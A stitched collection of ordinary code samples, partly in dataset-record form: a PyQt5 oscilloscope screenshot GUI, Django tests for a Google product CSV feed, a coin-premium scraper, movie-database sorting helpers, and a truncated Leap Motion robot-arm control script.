u'mycompany.myproduct.subproduct.version'\nctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)\n\n\nclass 
MainWindow(QWidget):\n instrumentName = 'Unitialized Instrument'\n instrumentList = []\n instrumentTypes = {}\n instrumentKey = 'Uninitialized Key'\n\n def __init__(self):\n super(MainWindow, self).__init__()\n self.configInstrument = Instrument()\n self.instrumentList = self.configInstrument.listInstruments()\n self.instrumentTypes = self.configInstrument.listInstrumentTypes()\n self.initUI()\n\n def initUI(self):\n self.setGeometry(300, 300, 500, 600)\n self.setWindowTitle('Tektronix Channel Label Widget')\n self.setWindowIcon(QIcon('Steam_icon_logo.gif'))\n instrumentGroupBox = QGroupBox()\n instrumentGrid = QGridLayout()\n self.scopeComboBox = QComboBox()\n for index in range(0, len(self.instrumentList)):\n self.scopeComboBox.addItem(self.instrumentList[index].rstrip())\n instrumentGrid.addWidget(self.scopeComboBox, 0, 0)\n self.initScopeButton = QPushButton('Initialize Scope', self)\n self.initScopeButton.clicked[bool].connect(self.initScope)\n instrumentGrid.addWidget(self.initScopeButton, 1, 0)\n scopeLabel = QLabel(self)\n scopeLabel.setText('Scope Type')\n instrumentGrid.addWidget(scopeLabel, 2, 0)\n self.scopeIDN = QLabel(self)\n self.scopeIDN.setText(self.instrumentName)\n instrumentGrid.addWidget(self.scopeIDN, 3, 0)\n instrumentGroupBox.setLayout(instrumentGrid)\n instrumentGroupBox.setLayout(instrumentGrid)\n startButtonGroupBox = QGroupBox()\n startButtonLayout = QHBoxLayout()\n self.startStopButton = QPushButton('Test Scope Connection', self)\n self.startStopButton.clicked[bool].connect(self.startStopTest)\n self.startStopButton.setEnabled(False)\n startButtonLayout.addWidget(self.startStopButton)\n self.getScopeShot = QPushButton('Get Scope Shot', self)\n pictureGroupBox = QGroupBox()\n pictureLayout = QHBoxLayout()\n self.pictLabel = QLabel(self)\n pictureLayout.addWidget(self.pictLabel)\n pictureGroupBox.setLayout(pictureLayout)\n self.getScopeShot.clicked[bool].connect(self.scopeShot)\n self.getScopeShot.setEnabled(False)\n startButtonLayout.addWidget(self.getScopeShot)\n startButtonGroupBox.setLayout(startButtonLayout)\n grid = QGridLayout()\n grid.addWidget(instrumentGroupBox, 0, 0)\n grid.addWidget(startButtonGroupBox, 1, 0)\n grid.addWidget(pictureGroupBox, 2, 0)\n self.setLayout(grid)\n self.show()\n\n def initScope(self):\n self.instrumentName = self.scopeComboBox.currentText()\n self.scope, self.scopeName = self.configInstrument.initInstrument(\n '172.18.18.24')\n print('Configured Scope: ' + self.scopeName)\n self.scopeIDN.setText(self.scopeName)\n self.startStopButton.setEnabled(True)\n self.getScopeShot.setEnabled(True)\n\n def startStopTest(self):\n self.scope.setState(1, 'ON')\n self.scope.setState(2, 'ON')\n self.scope.setState(3, 'ON')\n self.scope.setState(4, 'ON')\n self.scope.setBandwidth(1, 'ON')\n self.scope.setBandwidth(2, 'ON')\n self.scope.setBandwidth(3, 'ON')\n self.scope.setBandwidth(4, 'ON')\n self.scope.setEdgeTrigger(3, 50, 'FALL')\n\n def scopeShot(self):\n print('Get Scope Shot')\n self.scope.clear()\n print('ReadIDN Returns: ' + str(self.scope.readIDN()))\n print('next line')\n self.scope.clear()\n self.scope.scopeScreenCaptureCopyToPC('siglentImage.png')\n self.pixmap = QPixmap('siglentImage.png')\n self.pictLabel.setText('Image Here')\n self.pictLabel.setPixmap(self.pixmap)\n self.pictLabel.resize(self.pixmap.width(), self.pixmap.height())\n\n\nif __name__ == '__main__':\n app = QCoreApplication.instance()\n if app is None:\n app = QApplication(sys.argv)\n ex = MainWindow()\n app.exec_()\n", "step-5": "# -*- coding: utf-8 
-*-\r\n\"\"\"\r\nCreated on 11/03/2020\r\n\r\n@author: [email protected]\r\n\"\"\"\r\nimport sys\r\nfrom PyQt5.QtWidgets import (QApplication, QWidget, QLabel, QRadioButton, QVBoxLayout, QCheckBox, QProgressBar,\r\n QGroupBox, QComboBox, QLineEdit, QPushButton, QMessageBox, QInputDialog, QDialog, QDialogButtonBox, QSlider, QGridLayout, QHBoxLayout)\r\nfrom PyQt5.QtGui import QIcon, QPainter, QPen, QFont, QPixmap\r\nfrom PyQt5.QtCore import Qt\r\nfrom PyQt5.QtCore import QCoreApplication, QObject, QRunnable, QThread, QThreadPool, pyqtSignal, pyqtSlot\r\n\r\n#append the relative location you want to import from\r\nsys.path.append(\"../Instrument_Libraries\")\r\nfrom instrumentConfig import Instrument\r\n \r\n#For some reason the following code needs to be here for the Steam icon to show on the taskbar.\r\n#Google code, don't know why.\r\nimport ctypes\r\nmyappid = u'mycompany.myproduct.subproduct.version' # arbitrary string\r\nctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid) \r\n\r\nclass MainWindow(QWidget):\r\n\r\n instrumentName = \"Unitialized Instrument\"\r\n \r\n \r\n instrumentList = []\r\n #Instrument Types is a dictionary\r\n instrumentTypes = {}\r\n instrumentKey = \"Uninitialized Key\"\r\n \r\n def __init__(self):\r\n super(MainWindow, self).__init__()\r\n \r\n self.configInstrument = Instrument()\r\n self.instrumentList = self.configInstrument.listInstruments()\r\n self.instrumentTypes = self.configInstrument.listInstrumentTypes()\r\n\r\n self.initUI()\r\n\r\n\r\n def initUI(self): \r\n \r\n self.setGeometry(300, 300, 500, 600)\r\n self.setWindowTitle('Tektronix Channel Label Widget')\r\n self.setWindowIcon(QIcon('Steam_icon_logo.gif')) \r\n \r\n instrumentGroupBox = QGroupBox()\r\n instrumentGrid = QGridLayout()\r\n \r\n self.scopeComboBox = QComboBox()\r\n for index in range (0, len(self.instrumentList)):\r\n self.scopeComboBox.addItem(self.instrumentList[index].rstrip()) \r\n instrumentGrid.addWidget(self.scopeComboBox, 0, 0)\r\n \r\n self.initScopeButton = QPushButton('Initialize Scope', self)\r\n self.initScopeButton.clicked[bool].connect(self.initScope)\r\n \r\n instrumentGrid.addWidget(self.initScopeButton, 1, 0)\r\n\r\n scopeLabel = QLabel(self)\r\n scopeLabel.setText(\"Scope Type\")\r\n instrumentGrid.addWidget(scopeLabel, 2, 0)\r\n\r\n self.scopeIDN = QLabel(self)\r\n self.scopeIDN.setText(self.instrumentName)\r\n instrumentGrid.addWidget(self.scopeIDN, 3, 0)\r\n \r\n instrumentGroupBox.setLayout(instrumentGrid)\r\n \r\n instrumentGroupBox.setLayout(instrumentGrid)\r\n\r\n startButtonGroupBox = QGroupBox()\r\n startButtonLayout = QHBoxLayout()\r\n self.startStopButton = QPushButton('Test Scope Connection', self)\r\n \r\n self.startStopButton.clicked[bool].connect(self.startStopTest)\r\n self.startStopButton.setEnabled(False)\r\n startButtonLayout.addWidget(self.startStopButton)\r\n\r\n\r\n self.getScopeShot = QPushButton('Get Scope Shot', self)\r\n \r\n\r\n pictureGroupBox = QGroupBox()\r\n pictureLayout = QHBoxLayout()\r\n self.pictLabel = QLabel(self)\r\n pictureLayout.addWidget(self.pictLabel)\r\n pictureGroupBox.setLayout(pictureLayout)\r\n\r\n self.getScopeShot.clicked[bool].connect(self.scopeShot)\r\n self.getScopeShot.setEnabled(False)\r\n startButtonLayout.addWidget(self.getScopeShot)\r\n\r\n startButtonGroupBox.setLayout(startButtonLayout)\r\n\r\n grid = QGridLayout()\r\n grid.addWidget(instrumentGroupBox, 0, 0)\r\n grid.addWidget(startButtonGroupBox, 1, 0)\r\n grid.addWidget(pictureGroupBox, 2, 0)\r\n\r\n self.setLayout(grid)\r\n\r\n 
self.show()\r\n\r\n def initScope(self):\r\n \r\n self.instrumentName = self.scopeComboBox.currentText()\r\n \r\n # self.scope, self.scopeName = self.configInstrument.initInstrument(self.instrumentName)\r\n self.scope, self.scopeName = self.configInstrument.initInstrument(\"172.18.18.24\")\r\n \r\n print (\"Configured Scope: \" + self.scopeName)\r\n \r\n self.scopeIDN.setText(self.scopeName)\r\n\r\n self.startStopButton.setEnabled(True)\r\n self.getScopeShot.setEnabled(True)\r\n\r\n def startStopTest(self):\r\n \r\n self.scope.setState(1, \"ON\")\r\n self.scope.setState(2, \"ON\")\r\n self.scope.setState(3, \"ON\")\r\n self.scope.setState(4, \"ON\")\r\n \r\n self.scope.setBandwidth(1, \"ON\")\r\n self.scope.setBandwidth(2, \"ON\")\r\n self.scope.setBandwidth(3, \"ON\")\r\n self.scope.setBandwidth(4, \"ON\")\r\n \r\n #Siglent library hard codes trigger level to mV\r\n self.scope.setEdgeTrigger(3, 50, \"FALL\")\r\n \r\n def scopeShot(self):\r\n print (\"Get Scope Shot\")\r\n self.scope.clear()\r\n print (\"ReadIDN Returns: \" + str(self.scope.readIDN()))\r\n print (\"next line\")\r\n self.scope.clear()\r\n \r\n self.scope.scopeScreenCaptureCopyToPC(\"siglentImage.png\")\r\n \r\n # loading image \r\n self.pixmap = QPixmap(\"siglentImage.png\") \r\n \r\n # adding image to label \r\n self.pictLabel.setText(\"Image Here\") \r\n self.pictLabel.setPixmap(self.pixmap) \r\n \r\n # Optional, resize label to image size \r\n self.pictLabel.resize(self.pixmap.width(), \r\n self.pixmap.height()) \r\n \r\n \r\nif __name__ == '__main__':\r\n \r\n app = QCoreApplication.instance()\r\n if app is None:\r\n app = QApplication(sys.argv)\r\n ex = MainWindow()\r\n app.exec_() \r\n", "step-ids": [ 4, 6, 9, 10, 11 ] }
[ 4, 6, 9, 10, 11 ]
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.test import TestCase
from django.core.urlresolvers import reverse

from google_product_feeder.feed import CSVMerchantFeed, MERCHANT_FEED_COLUMNS


CSV_HEADINGS = ','.join(MERCHANT_FEED_COLUMNS) + '\r\n'


class AttrNameFakeModel(object):
    # A fake model that returns the attribute name upon attribute access.
    def __getattr__(self, name):
        return name


class EmptyFakeModel(object):
    # A fake model with no attributes.
    def __getattr__(self, name):
        raise AttributeError


class UppercaseBrandFeed(CSVMerchantFeed):
    def get_brand(self, obj):
        return obj.brand.upper()


class CSVMerchantFeedTest(TestCase):

    def test_csv_empty(self):
        feed = CSVMerchantFeed([])
        output = feed.get_content()
        self.assertEquals(output, CSV_HEADINGS)

    def test_csv(self):
        feed = CSVMerchantFeed([AttrNameFakeModel()])
        output = feed.get_content()
        self.assertEquals(output, CSV_HEADINGS * 2)

    def test_csv_missing_attribute(self):
        feed = CSVMerchantFeed([EmptyFakeModel()])
        output = feed.get_content()
        empty_data_row = ',' * (len(MERCHANT_FEED_COLUMNS) - 1) + '\r\n'
        self.assertEquals(output, CSV_HEADINGS + empty_data_row)

    def test_csv_with_get_method(self):
        feed = UppercaseBrandFeed([AttrNameFakeModel()])
        output = feed.get_content()
        data_row = CSV_HEADINGS.replace('brand', 'BRAND')
        self.assertEquals(output, CSV_HEADINGS + data_row)


class CSVFeedViewTest(TestCase):

    def test_view_empty(self):
        url = reverse('google_feed')
        response = self.client.get(url)
        self.assertEquals(response.content, CSV_HEADINGS)

    def test_has_correct_headers(self):
        # content-type is 'text/csv', content-disposition is 'attachment',
        # filename is 'google.csv'
        url = reverse('google_feed')
        response = self.client.get(url)
        self.assertEqual(response['Content-Type'], 'text/csv')
        self.assertEqual(response['Content-Disposition'],
                         'attachment; filename="google.csv"')
normal
{ "blob_id": "924fd89a835528fa28e1226912a2e4be9c4e1d5d", "index": 152, "step-1": "<mask token>\n\n\nclass UppercaseBrandFeed(CSVMerchantFeed):\n\n def get_brand(self, obj):\n return obj.brand.upper()\n\n\nclass CSVMerchantFeedTest(TestCase):\n\n def test_csv_empty(self):\n feed = CSVMerchantFeed([])\n output = feed.get_content()\n self.assertEquals(output, CSV_HEADINGS)\n\n def test_csv(self):\n feed = CSVMerchantFeed([AttrNameFakeModel()])\n output = feed.get_content()\n self.assertEquals(output, CSV_HEADINGS * 2)\n\n def test_csv_missing_attribute(self):\n feed = CSVMerchantFeed([EmptyFakeModel()])\n output = feed.get_content()\n empty_data_row = ',' * (len(MERCHANT_FEED_COLUMNS) - 1) + '\\r\\n'\n self.assertEquals(output, CSV_HEADINGS + empty_data_row)\n\n def test_csv_with_get_method(self):\n feed = UppercaseBrandFeed([AttrNameFakeModel()])\n output = feed.get_content()\n data_row = CSV_HEADINGS.replace('brand', 'BRAND')\n self.assertEquals(output, CSV_HEADINGS + data_row)\n\n\nclass CSVFeedViewTest(TestCase):\n\n def test_view_empty(self):\n url = reverse('google_feed')\n response = self.client.get(url)\n self.assertEquals(response.content, CSV_HEADINGS)\n\n def test_has_correct_headers(self):\n url = reverse('google_feed')\n response = self.client.get(url)\n self.assertEqual(response['Content-Type'], 'text/csv')\n self.assertEqual(response['Content-Disposition'],\n 'attachment; filename=\"google.csv\"')\n", "step-2": "<mask token>\n\n\nclass AttrNameFakeModel(object):\n <mask token>\n\n\nclass EmptyFakeModel(object):\n\n def __getattr__(self, name):\n raise AttributeError\n\n\nclass UppercaseBrandFeed(CSVMerchantFeed):\n\n def get_brand(self, obj):\n return obj.brand.upper()\n\n\nclass CSVMerchantFeedTest(TestCase):\n\n def test_csv_empty(self):\n feed = CSVMerchantFeed([])\n output = feed.get_content()\n self.assertEquals(output, CSV_HEADINGS)\n\n def test_csv(self):\n feed = CSVMerchantFeed([AttrNameFakeModel()])\n output = feed.get_content()\n self.assertEquals(output, CSV_HEADINGS * 2)\n\n def test_csv_missing_attribute(self):\n feed = CSVMerchantFeed([EmptyFakeModel()])\n output = feed.get_content()\n empty_data_row = ',' * (len(MERCHANT_FEED_COLUMNS) - 1) + '\\r\\n'\n self.assertEquals(output, CSV_HEADINGS + empty_data_row)\n\n def test_csv_with_get_method(self):\n feed = UppercaseBrandFeed([AttrNameFakeModel()])\n output = feed.get_content()\n data_row = CSV_HEADINGS.replace('brand', 'BRAND')\n self.assertEquals(output, CSV_HEADINGS + data_row)\n\n\nclass CSVFeedViewTest(TestCase):\n\n def test_view_empty(self):\n url = reverse('google_feed')\n response = self.client.get(url)\n self.assertEquals(response.content, CSV_HEADINGS)\n\n def test_has_correct_headers(self):\n url = reverse('google_feed')\n response = self.client.get(url)\n self.assertEqual(response['Content-Type'], 'text/csv')\n self.assertEqual(response['Content-Disposition'],\n 'attachment; filename=\"google.csv\"')\n", "step-3": "<mask token>\n\n\nclass AttrNameFakeModel(object):\n\n def __getattr__(self, name):\n return name\n\n\nclass EmptyFakeModel(object):\n\n def __getattr__(self, name):\n raise AttributeError\n\n\nclass UppercaseBrandFeed(CSVMerchantFeed):\n\n def get_brand(self, obj):\n return obj.brand.upper()\n\n\nclass CSVMerchantFeedTest(TestCase):\n\n def test_csv_empty(self):\n feed = CSVMerchantFeed([])\n output = feed.get_content()\n self.assertEquals(output, CSV_HEADINGS)\n\n def test_csv(self):\n feed = CSVMerchantFeed([AttrNameFakeModel()])\n output = feed.get_content()\n self.assertEquals(output, 
CSV_HEADINGS * 2)\n\n def test_csv_missing_attribute(self):\n feed = CSVMerchantFeed([EmptyFakeModel()])\n output = feed.get_content()\n empty_data_row = ',' * (len(MERCHANT_FEED_COLUMNS) - 1) + '\\r\\n'\n self.assertEquals(output, CSV_HEADINGS + empty_data_row)\n\n def test_csv_with_get_method(self):\n feed = UppercaseBrandFeed([AttrNameFakeModel()])\n output = feed.get_content()\n data_row = CSV_HEADINGS.replace('brand', 'BRAND')\n self.assertEquals(output, CSV_HEADINGS + data_row)\n\n\nclass CSVFeedViewTest(TestCase):\n\n def test_view_empty(self):\n url = reverse('google_feed')\n response = self.client.get(url)\n self.assertEquals(response.content, CSV_HEADINGS)\n\n def test_has_correct_headers(self):\n url = reverse('google_feed')\n response = self.client.get(url)\n self.assertEqual(response['Content-Type'], 'text/csv')\n self.assertEqual(response['Content-Disposition'],\n 'attachment; filename=\"google.csv\"')\n", "step-4": "from __future__ import unicode_literals\nfrom django.test import TestCase\nfrom django.core.urlresolvers import reverse\nfrom google_product_feeder.feed import CSVMerchantFeed, MERCHANT_FEED_COLUMNS\nCSV_HEADINGS = ','.join(MERCHANT_FEED_COLUMNS) + '\\r\\n'\n\n\nclass AttrNameFakeModel(object):\n\n def __getattr__(self, name):\n return name\n\n\nclass EmptyFakeModel(object):\n\n def __getattr__(self, name):\n raise AttributeError\n\n\nclass UppercaseBrandFeed(CSVMerchantFeed):\n\n def get_brand(self, obj):\n return obj.brand.upper()\n\n\nclass CSVMerchantFeedTest(TestCase):\n\n def test_csv_empty(self):\n feed = CSVMerchantFeed([])\n output = feed.get_content()\n self.assertEquals(output, CSV_HEADINGS)\n\n def test_csv(self):\n feed = CSVMerchantFeed([AttrNameFakeModel()])\n output = feed.get_content()\n self.assertEquals(output, CSV_HEADINGS * 2)\n\n def test_csv_missing_attribute(self):\n feed = CSVMerchantFeed([EmptyFakeModel()])\n output = feed.get_content()\n empty_data_row = ',' * (len(MERCHANT_FEED_COLUMNS) - 1) + '\\r\\n'\n self.assertEquals(output, CSV_HEADINGS + empty_data_row)\n\n def test_csv_with_get_method(self):\n feed = UppercaseBrandFeed([AttrNameFakeModel()])\n output = feed.get_content()\n data_row = CSV_HEADINGS.replace('brand', 'BRAND')\n self.assertEquals(output, CSV_HEADINGS + data_row)\n\n\nclass CSVFeedViewTest(TestCase):\n\n def test_view_empty(self):\n url = reverse('google_feed')\n response = self.client.get(url)\n self.assertEquals(response.content, CSV_HEADINGS)\n\n def test_has_correct_headers(self):\n url = reverse('google_feed')\n response = self.client.get(url)\n self.assertEqual(response['Content-Type'], 'text/csv')\n self.assertEqual(response['Content-Disposition'],\n 'attachment; filename=\"google.csv\"')\n", "step-5": "#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.test import TestCase\nfrom django.core.urlresolvers import reverse\n\nfrom google_product_feeder.feed import CSVMerchantFeed, MERCHANT_FEED_COLUMNS\n\n\nCSV_HEADINGS = ','.join(MERCHANT_FEED_COLUMNS) + '\\r\\n'\n\n\nclass AttrNameFakeModel(object):\n # A fake model that returns the attribute name upon attribute access.\n def __getattr__(self, name):\n return name\n\n\nclass EmptyFakeModel(object):\n # A fake model with no attributes.\n def __getattr__(self, name):\n raise AttributeError\n\n\nclass UppercaseBrandFeed(CSVMerchantFeed):\n def get_brand(self, obj):\n return obj.brand.upper()\n\n\nclass CSVMerchantFeedTest(TestCase):\n\n def test_csv_empty(self):\n feed = CSVMerchantFeed([])\n output = feed.get_content()\n self.assertEquals(output, CSV_HEADINGS)\n\n def test_csv(self):\n feed = CSVMerchantFeed([AttrNameFakeModel()])\n output = feed.get_content()\n self.assertEquals(output, CSV_HEADINGS * 2)\n\n def test_csv_missing_attribute(self):\n feed = CSVMerchantFeed([EmptyFakeModel()])\n output = feed.get_content()\n empty_data_row = ',' * (len(MERCHANT_FEED_COLUMNS) - 1) + '\\r\\n'\n self.assertEquals(output, CSV_HEADINGS + empty_data_row)\n\n def test_csv_with_get_method(self):\n feed = UppercaseBrandFeed([AttrNameFakeModel()])\n output = feed.get_content()\n data_row = CSV_HEADINGS.replace('brand', 'BRAND')\n self.assertEquals(output, CSV_HEADINGS + data_row)\n\n\nclass CSVFeedViewTest(TestCase):\n\n def test_view_empty(self):\n url = reverse('google_feed')\n response = self.client.get(url)\n self.assertEquals(response.content, CSV_HEADINGS)\n\n def test_has_correct_headers(self):\n # content-type is 'text/csv', content-disposition is 'attachment',\n # filename is 'google.csv'\n url = reverse('google_feed')\n response = self.client.get(url)\n self.assertEqual(response['Content-Type'],\n 'text/csv')\n self.assertEqual(response['Content-Disposition'],\n 'attachment; filename=\"google.csv\"')\n", "step-ids": [ 10, 13, 14, 16, 17 ] }
[ 10, 13, 14, 16, 17 ]
import requests
import json


def get():
    market = 'Premium'
    url = 'https://coinpremiums.herokuapp.com/json'

    try:
        result = ""
        premiums = requests.get(url).json()

        for exchange, exchange_currencies in premiums['premium'].items():
            result += '[[{} | '.format(exchange.title())
            _sum = 0
            _cnt = 0
            for currency_name, currency in exchange_currencies.items():
                premium = currency['raw'] - 1
                result += '[{}] {:.2%} '.format(currency_name.upper(), premium)
                _cnt += 1
                _sum += premium
            result += '[평균] {:.2%} ]] '.format(_sum / _cnt)
    except Exception as e:
        result = '[{market}] 에러! : {msg}'.format(market=market, msg=e.__repr__())

    return result
normal
{ "blob_id": "b5581be044013df9ff812f285f99ca67c4f96a62", "index": 2927, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef get():\n market = 'Premium'\n url = 'https://coinpremiums.herokuapp.com/json'\n try:\n result = ''\n premiums = requests.get(url).json()\n for exchange, exchange_currencies in premiums['premium'].items():\n result += '[[{} | '.format(exchange.title())\n _sum = 0\n _cnt = 0\n for currency_name, currency in exchange_currencies.items():\n premium = currency['raw'] - 1\n result += '[{}] {:.2%} '.format(currency_name.upper(), premium)\n _cnt += 1\n _sum += premium\n result += '[평균] {:.2%} ]] '.format(_sum / _cnt)\n except Exception as e:\n result = '[{market}] 에러! : {msg}'.format(market=market, msg=e.\n __repr__())\n return result\n", "step-3": "import requests\nimport json\n\n\ndef get():\n market = 'Premium'\n url = 'https://coinpremiums.herokuapp.com/json'\n try:\n result = ''\n premiums = requests.get(url).json()\n for exchange, exchange_currencies in premiums['premium'].items():\n result += '[[{} | '.format(exchange.title())\n _sum = 0\n _cnt = 0\n for currency_name, currency in exchange_currencies.items():\n premium = currency['raw'] - 1\n result += '[{}] {:.2%} '.format(currency_name.upper(), premium)\n _cnt += 1\n _sum += premium\n result += '[평균] {:.2%} ]] '.format(_sum / _cnt)\n except Exception as e:\n result = '[{market}] 에러! : {msg}'.format(market=market, msg=e.\n __repr__())\n return result\n", "step-4": "import requests\nimport json\n\n\ndef get():\n market = 'Premium'\n url = 'https://coinpremiums.herokuapp.com/json'\n\n try:\n result = \"\"\n premiums = requests.get(url).json()\n\n for exchange, exchange_currencies in premiums['premium'].items():\n result += '[[{} | '.format(exchange.title())\n _sum = 0\n _cnt = 0\n for currency_name, currency in exchange_currencies.items():\n premium = currency['raw'] - 1\n result += '[{}] {:.2%} '.format(currency_name.upper(), premium)\n _cnt += 1\n _sum += premium\n result += '[평균] {:.2%} ]] '.format(_sum / _cnt)\n except Exception as e:\n result = '[{market}] 에러! : {msg}'.format(market=market, msg=e.__repr__())\n\n return result\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
from django.contrib.auth.models import User
from rt.models import Movie_Suggestion, MovieDB, ActorDB, TVDB


def user_present(username):
    if User.objects.filter(username=username).count():
        return True
    return False


#Takes in a list of MovieDB/TVDB objects
#Outputs a list of sorted titles
def sort_title(movies):
    titles = []
    for i in movies:
        titles.append(str(i.title))
    titles.sort()
    return titles


#Takes a list of MovieDB objects and their titles as Strings
#Output a list of tuples containing the (title, id)
def sort_id(movies, titles):
    ids = []
    for i in titles:
        try:
            movie_id = MovieDB.objects.get(title=i).id
            ids.append((i, movie_id))
        except MovieDB.DoesNotExist:
            return []
    return ids


def sort_tv_id(tvs, titles):
    ids = []
    for i in titles:
        try:
            tv_id = TVDB.objects.get(title=i).id
            ids.append((i, tv_id))
        except TVDB.DoesNotExist:
            return []
    return ids


def sort_name(actors):
    names = []
    for i in actors:
        names.append(str(i.name))
    names.sort()
    return names


def sort_actor_id(actors, names):
    ids = []
    for i in names:
        try:
            actor_id = ActorDB.objects.get(name=i).id
            ids.append((i, actor_id))
        except ActorDB.DoesNotExist:
            return []
    return ids
normal
{ "blob_id": "1e84b28580b97e77394be0490f3d8db3d62a2ccb", "index": 1213, "step-1": "<mask token>\n\n\ndef sort_id(movies, titles):\n ids = []\n for i in titles:\n try:\n movie_id = MovieDB.objects.get(title=i).id\n ids.append((i, movie_id))\n except MovieDB.DoesNotExist:\n return []\n return ids\n\n\n<mask token>\n\n\ndef sort_name(actors):\n names = []\n for i in actors:\n names.append(str(i.name))\n names.sort()\n return names\n\n\ndef sort_actor_id(actors, names):\n ids = []\n for i in names:\n try:\n actor_id = ActorDB.objects.get(name=i).id\n ids.append((i, actor_id))\n except ActorDB.DoesNotExist:\n return []\n return ids\n", "step-2": "<mask token>\n\n\ndef user_present(username):\n if User.objects.filter(username=username).count():\n return True\n return False\n\n\n<mask token>\n\n\ndef sort_id(movies, titles):\n ids = []\n for i in titles:\n try:\n movie_id = MovieDB.objects.get(title=i).id\n ids.append((i, movie_id))\n except MovieDB.DoesNotExist:\n return []\n return ids\n\n\ndef sort_tv_id(tvs, titles):\n ids = []\n for i in titles:\n try:\n tv_id = TVDB.objects.get(title=i).id\n ids.append((i, tv_id))\n except TVDB.DoesNotExist:\n return []\n return ids\n\n\ndef sort_name(actors):\n names = []\n for i in actors:\n names.append(str(i.name))\n names.sort()\n return names\n\n\ndef sort_actor_id(actors, names):\n ids = []\n for i in names:\n try:\n actor_id = ActorDB.objects.get(name=i).id\n ids.append((i, actor_id))\n except ActorDB.DoesNotExist:\n return []\n return ids\n", "step-3": "<mask token>\n\n\ndef user_present(username):\n if User.objects.filter(username=username).count():\n return True\n return False\n\n\ndef sort_title(movies):\n titles = []\n for i in movies:\n titles.append(str(i.title))\n titles.sort()\n return titles\n\n\ndef sort_id(movies, titles):\n ids = []\n for i in titles:\n try:\n movie_id = MovieDB.objects.get(title=i).id\n ids.append((i, movie_id))\n except MovieDB.DoesNotExist:\n return []\n return ids\n\n\ndef sort_tv_id(tvs, titles):\n ids = []\n for i in titles:\n try:\n tv_id = TVDB.objects.get(title=i).id\n ids.append((i, tv_id))\n except TVDB.DoesNotExist:\n return []\n return ids\n\n\ndef sort_name(actors):\n names = []\n for i in actors:\n names.append(str(i.name))\n names.sort()\n return names\n\n\ndef sort_actor_id(actors, names):\n ids = []\n for i in names:\n try:\n actor_id = ActorDB.objects.get(name=i).id\n ids.append((i, actor_id))\n except ActorDB.DoesNotExist:\n return []\n return ids\n", "step-4": "from django.contrib.auth.models import User\nfrom rt.models import Movie_Suggestion, MovieDB, ActorDB, TVDB\n\n\ndef user_present(username):\n if User.objects.filter(username=username).count():\n return True\n return False\n\n\ndef sort_title(movies):\n titles = []\n for i in movies:\n titles.append(str(i.title))\n titles.sort()\n return titles\n\n\ndef sort_id(movies, titles):\n ids = []\n for i in titles:\n try:\n movie_id = MovieDB.objects.get(title=i).id\n ids.append((i, movie_id))\n except MovieDB.DoesNotExist:\n return []\n return ids\n\n\ndef sort_tv_id(tvs, titles):\n ids = []\n for i in titles:\n try:\n tv_id = TVDB.objects.get(title=i).id\n ids.append((i, tv_id))\n except TVDB.DoesNotExist:\n return []\n return ids\n\n\ndef sort_name(actors):\n names = []\n for i in actors:\n names.append(str(i.name))\n names.sort()\n return names\n\n\ndef sort_actor_id(actors, names):\n ids = []\n for i in names:\n try:\n actor_id = ActorDB.objects.get(name=i).id\n ids.append((i, actor_id))\n except ActorDB.DoesNotExist:\n return []\n return 
ids\n", "step-5": "from django.contrib.auth.models import User\nfrom rt.models import Movie_Suggestion, MovieDB, ActorDB, TVDB\n\ndef user_present(username):\n\tif User.objects.filter(username=username).count():\n\t\treturn True\t\n\treturn False\n\t\n#Takes in a list of MovieDB/TVDB objects\n#Outputs a list of sorted titles\ndef sort_title(movies):\n\ttitles = []\n\tfor i in movies:\n\t\ttitles.append(str(i.title))\n\ttitles.sort()\n\treturn titles\n\t\n#Takes a list of MovieDB objects and their titles as Strings\n#Output a list of tuples containing the (title, id)\ndef sort_id(movies, titles):\n\tids = []\n\tfor i in titles:\n\t\ttry:\n\t\t\tmovie_id = MovieDB.objects.get(title=i).id\n\t\t\tids.append((i, movie_id))\n\t\texcept MovieDB.DoesNotExist:\n\t\t\treturn []\n\treturn ids\n\ndef sort_tv_id(tvs, titles):\n\tids = []\n\tfor i in titles:\n\t\ttry:\n\t\t\ttv_id = TVDB.objects.get(title=i).id\n\t\t\tids.append((i, tv_id))\n\t\texcept TVDB.DoesNotExist:\n\t\t\treturn []\n\treturn ids\n\ndef sort_name(actors):\n\tnames = []\n\tfor i in actors:\n\t\tnames.append(str(i.name))\n\tnames.sort()\n\treturn names\n\t\ndef sort_actor_id(actors, names):\n\tids = []\n\tfor i in names:\n\t\ttry:\n\t\t\tactor_id = ActorDB.objects.get(name=i).id\n\t\t\tids.append((i, actor_id))\n\t\texcept ActorDB.DoesNotExist:\n\t\t\treturn []\n\treturn ids\n", "step-ids": [ 3, 5, 6, 7, 8 ] }
[ 3, 5, 6, 7, 8 ]
#!/usr/bin/env python2

# A basic example of sending Blue a command in cartesian space.
from blue_interface import BlueInterface
import numpy as np
import time
import sys
import argparse

import Leap
from utils.rotations import quat2euler, euler2quat, mat2euler
from utils.leap_listener import SampleListener

import matplotlib.pyplot as plt

parser = argparse.ArgumentParser(description='switch the control mode')
parser.add_argument('--IK', default=False, action='store_true',
                    help='switch to IK-control')
args = parser.parse_args()

side = "right"
ip = "127.0.0.1"
blue = BlueInterface(side, ip)
# Initialize the blue gripper
blue.calibrate_gripper()

# Leap Motion
listener = SampleListener()
controller = Leap.Controller()

target_angles_init = np.array([0.0, -0.85, 1.571, 0, -1.571, -0.2, 0.0])
target_angles_hist = target_angles_init.copy()

i = 0
while True:
    hands_data = listener.get_hand(controller)

    ## IK approach
    if args.IK:
        if "Right hand" in hands_data.keys():
            hand_data = hands_data["Right hand"]
            pos = hand_data['palm_position']
            ori = [hand_data['palm_pitch'], hand_data['palm_roll'], hand_data['palm_yaw']]
            grab_strength = hand_data['grab_strength']
            target_position = [x/1000 for x in pos]  # x, y, z
            pos[0], pos[1], pos[2] = pos[2], pos[0], pos[1]  # z x y to x y z
            ori[0], ori[1], ori[2] = ori[2], -ori[0]+3.14, ori[1]  # z y x to x y z

            # Adjust the offset
            target_position[0] -= 0.4
            target_position[2] += 0.3
            target_orientation = list(euler2quat(ori))  # w, x, y, z
            # target_orientation = target_orientation[1:] + target_orientation[:1]

            # Compute IK solution
            goal_curr = blue.inverse_kinematics(target_position, target_orientation)
